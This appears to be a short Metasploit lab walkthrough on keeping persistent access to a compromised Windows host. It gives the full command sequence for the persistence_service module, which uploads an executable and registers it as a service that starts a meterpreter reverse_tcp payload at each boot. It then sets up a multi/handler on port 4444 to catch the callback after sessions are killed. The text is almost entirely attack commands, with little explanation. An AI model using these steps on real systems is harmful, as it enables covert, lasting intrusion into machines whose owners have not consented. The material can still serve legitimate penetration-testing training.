❗ In order to set up persistence, administrative privileges are required.
background
search platform:windows persistence
use exploit/windows/local/persistence_service
info
# Description:
# This Module will generate and upload an executable to a remote host,
# next will make it a persistent service. It will create a new service
# which will start the payload whenever the service is running. Admin
# or system privilege is required.
set payload windows/meterpreter/reverse_tcp
set SESSION 1
run
Successful maintained access. Once the persistent backdoor is installed, it's going to continue to run (across restarts) as a service and a multi handler listening to a connection will receive a connection from the service.
exit
# Kill all sessions
sessions -K
sessions
# No active sessions.
Regain access to the system
use multi/handler
options
# Set the options as specified for the PERSISTENCE_SERVICE Exploit
set payload windows/meterpreter/reverse_tcp
set LHOST eth1
set LPORT 4444
run
